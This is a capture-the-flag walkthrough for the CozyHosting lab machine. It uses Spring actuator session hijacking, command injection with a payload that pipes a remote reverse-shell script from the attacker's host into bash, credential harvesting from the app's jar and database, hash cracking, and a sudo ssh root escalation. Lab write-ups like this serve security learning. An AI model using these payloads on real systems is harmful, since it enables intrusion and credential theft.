CozyHosting
- Date completed: 2023-09-04
- Difficulty: Easy
- OS: Linux
User flag
Initial nmap:
$ nmap -sC -sV cozyhosting.htb
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-04 20:39 CDT
Nmap scan report for cozyhosting.htb (10.10.11.230)
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4356bca7f2ec46ddc10f83304c2caaa8 (ECDSA)
|_ 256 6f7a6c3fa68de27595d47b71ac4f7e42 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Cozy Hosting - Home
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 253.57 seconds
The login page seems to be the only thing of interest on the site, but I wasn't able to get in using common username/password combinations or sql injection.
After running gobuster, I found that the /error page revealed a message indicating that the box is running spring boot. Testing showed that it's possible to access spring actuators (https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/spring-actuators)
We can then grab a session id from /acuators/sessions and replace our own with it to gain access to the admin panel at /admin
There's only one field we can access on the page, and after poking around, I found that it's vulnerable to command injection in the username field: user;whoami, as it gives this error:
The host was not added!
ssh: Could not resolve hostname user: Temporary failure in name resolution/bin/bash: line 1: whoami@localhost: command not found
Unfortunately, we can't use a space here... But https://unix.stackexchange.com/a/351509 shows a workaround.
We can then send this payload that gets a reverse shell script we have hosted on our machine on port 8090:
a;$(curl${IFS}10.10.14.16:8090/revshell.sh|bash)#
With the reverse shell, we can look around for anything interesting. The only thing I could find was cloudhosting-0.0.1.jar, which runs the app.
cp cloudhosting-0.0.1.jar /dev/shm && cd /dev/shm
unzip cloudhosting-0.0.1.jar && rm cloudhosting-0.0.1.jar
grep -ra password
The interesting line from the output is:
BOOT-INF/classes/application.properties:spring.datasource.password=...
We can then look for a similar line to find the username:
grep -ra spring.datasource.user
This shows us that the user is postgres. I attempted to su to that user without success, so next I tried psql:
psql -h localhost -U postgres
Password: ...
\l
List of databases
Name | Owner | Encoding | Collate | Ctype | Access privileges
-------------+----------+----------+-------------+-------------+-----------------------
cozyhosting | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
postgres | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
template0 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
\c cozyhosting
You are now connected to database "cozyhosting" as user "postgres".
\dt
List of relations
Schema | Name | Type | Owner
--------+-------+-------+----------
public | hosts | table | postgres
public | users | table | postgres
(2 rows)
select * from users;
name | password | role
-----------+--------------------------------------------------------------+-------
kanderson | ... | User
admin | ... | Admin
(2 rows)
We can then crack the password hashes using john
john -w=rockyou.txt hashes
We then get a password, which we can use to sign in as the user for the system (josh). Then we can get the user flag
Root flag
Running sudo -l shows that we are able to run ssh as root. Looking this up on GTFObins shows that we only need to run this command to get root:
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
Then get the flag.